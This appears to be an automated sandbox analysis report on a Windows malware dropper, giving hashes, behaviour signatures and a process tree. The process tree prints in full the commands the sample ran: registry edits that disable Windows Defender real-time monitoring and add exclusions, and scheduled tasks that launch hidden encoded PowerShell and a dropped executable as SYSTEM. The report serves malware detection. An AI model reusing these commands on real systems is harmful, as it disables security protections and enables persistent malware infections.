Analysis
-
max time kernel
139s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
-
submitted
12/10/2022, 03:02
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
7df461ed68851806063d61754df14025
-
SHA1
672dcbd3276ab666317a93327f6e32697b5b5156
-
SHA256
a37db29be97589121ad53db92aba82c6f783772a8edee815513ef7a635eb8996
-
SHA512
787a5c5ca5245ebb8f010482c3575cc5354c6f8b550ca0e4950a56f8a608342a49f2131f5d57f1bfa8a5d52c3c714450ab9c97d13cc3667d4f65f9944526b10f
-
SSDEEP
196608:91OuYntdE9wEMA/n8q+yJEgxZwy3Gc7MAZHfKd6r4Lm8/DBySp:3OxnbJjh014LZUM
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 36 IoCs
-
Executes dropped EXE 3 IoCs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 8 IoCs
-
Drops file in System32 directory 8 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 9 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS2E23.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS34A8.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gocLZkidB" /SC once /ST 02:06:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gocLZkidB"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gocLZkidB"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bKwcWZekAnYWEgmozo" /SC once /ST 03:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\aTHMYlu.exe\" q8 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {CAC35794-8447-40EC-B87D-D125CEC388C5} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {AC01950B-F869-45F9-8125-0A817E25D05B} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\aTHMYlu.exeC:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\aTHMYlu.exe q8 /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gvfLzHxXG" /SC once /ST 02:32:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gvfLzHxXG"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gvfLzHxXG"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gsOMycJNJ" /SC once /ST 01:30:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gsOMycJNJ"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gsOMycJNJ"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\YSrBLfWUtIHnuviW\zVsddHVk\OYyEmmdSZJjukORS.wsf"3⤵
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\YSrBLfWUtIHnuviW\zVsddHVk\OYyEmmdSZJjukORS.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbcTjUmdw" /SC once /ST 01:00:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gbcTjUmdw"3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-544253078-650171314-266572601-604658099-1869437892-27514233-1394747794-874942841"1⤵
- Windows security bypass
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1206079895370523631-1222223783-1545526374-381980836-1182463198-554382009-40927859"1⤵
- Windows security bypass
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1785833454-1442346969-8329203751704606699-1128035203398180918-9825795371369825792"1⤵
- Windows security bypass
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1613758087-47257997292903910-348070490-520483252-1392454367997946997-1202373225"1⤵
- Windows security bypass
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1663146613-13555749901771472372934294386-717613292-1146069755-1716212376790230955"1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.3MB
MD567baae91b940d0dad349167ff3f31da6
SHA1fdf9e3650b5682663f24af0b39af3203381ecb19
SHA2560eaf913e96a8ac7368218d995c8fedeb75b888ebe2107dfce17b6c0afe4f567a
SHA5123f81e1b7773c0d41d9e0f1bc7ae5b6ea1df15d2d8b501cc803548cdafa3074ffce7de3fae6ba86134bc73b8b60522547cde7dff9059afef2243ba26c2a4c8483
-
Filesize
6.3MB
MD567baae91b940d0dad349167ff3f31da6
SHA1fdf9e3650b5682663f24af0b39af3203381ecb19
SHA2560eaf913e96a8ac7368218d995c8fedeb75b888ebe2107dfce17b6c0afe4f567a
SHA5123f81e1b7773c0d41d9e0f1bc7ae5b6ea1df15d2d8b501cc803548cdafa3074ffce7de3fae6ba86134bc73b8b60522547cde7dff9059afef2243ba26c2a4c8483
-
Filesize
6.8MB
MD56cb87a9fc7dc1f2a5410fd428f5460f0
SHA12885b2d28a333d7bd9d6488ba2bf7312fc811e3a
SHA256fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52
SHA5124c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269
-
Filesize
6.8MB
MD56cb87a9fc7dc1f2a5410fd428f5460f0
SHA12885b2d28a333d7bd9d6488ba2bf7312fc811e3a
SHA256fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52
SHA5124c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269
-
Filesize
6.8MB
MD56cb87a9fc7dc1f2a5410fd428f5460f0
SHA12885b2d28a333d7bd9d6488ba2bf7312fc811e3a
SHA256fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52
SHA5124c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269
-
Filesize
6.8MB
MD56cb87a9fc7dc1f2a5410fd428f5460f0
SHA12885b2d28a333d7bd9d6488ba2bf7312fc811e3a
SHA256fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52
SHA5124c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269
-
Filesize
7KB
MD5621f10f2df792f9da54e2d2cdb5a22e9
SHA10134d5d033f2dd098269242a332fb821d245633a
SHA256448390cf83e5ddcbe78e37d90706f6a81d0b52f2217cf5afe66a9b6d352d6967
SHA5120d7ce7d49f1aeff9b323fb4cc6a92a2ce0449ae4c4be0c198a120646c1708b3c4b380f328ba4c2396c02cbd9959626a90701db244b40020b530ac989fcaa11db
-
Filesize
7KB
MD523ee83f417073e0319315b85ed063bdd
SHA1617f4cfc013fa87aa866e7a6f0feb4148e048465
SHA2564c7e3a912bbb4d895d35c7dd9ff1e1e9114050bf1147cd23d9570679ae5e7796
SHA512168f9973eb8f11416d221ab2a06aefccb0e3b5bdb1297832738b789b631811fce79cdf01e1105f86cc9b29f08794b1e7fb44d122920b30ec1f42130ed0762614
-
Filesize
7KB
MD527cb3302bf942233d7a1fb4b672733c8
SHA1f4f87a2a8a01dfd00ba40ceed37e619b6a9f3ff3
SHA25652db3638434b23d5f4f34f3c1e0163086382e354e68f11bd68c459ae6a87fc13
SHA512849ef1c53680ea49097f78e8a2e03f6e3bc0b7adc5f346abad7401b086a7dc92a8e31b7253dfcd4a2c29d41781ae5dfb20e569859784e7282433a086cd17b07c
-
Filesize
8KB
MD5d7795eaff4480a55ee7b5b2a82e2f0ae
SHA19f7d78c93c5647f87dc80ed60034de94b9b6b31a
SHA2566b7a676284bcc672e35428f435ca431cdf1878d5c6bc0825a4cfed66f1d4cd1f
SHA512050f87a08586cbc7a0d2bcd0c3accb79b595a6c499ffb2d245822de39b8cecc4c9479154723299c33b76f0d40145dd1783f20e74e90ff74b2f3ef9d41b6c4a11
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.3MB
MD567baae91b940d0dad349167ff3f31da6
SHA1fdf9e3650b5682663f24af0b39af3203381ecb19
SHA2560eaf913e96a8ac7368218d995c8fedeb75b888ebe2107dfce17b6c0afe4f567a
SHA5123f81e1b7773c0d41d9e0f1bc7ae5b6ea1df15d2d8b501cc803548cdafa3074ffce7de3fae6ba86134bc73b8b60522547cde7dff9059afef2243ba26c2a4c8483
-
Filesize
6.3MB
MD567baae91b940d0dad349167ff3f31da6
SHA1fdf9e3650b5682663f24af0b39af3203381ecb19
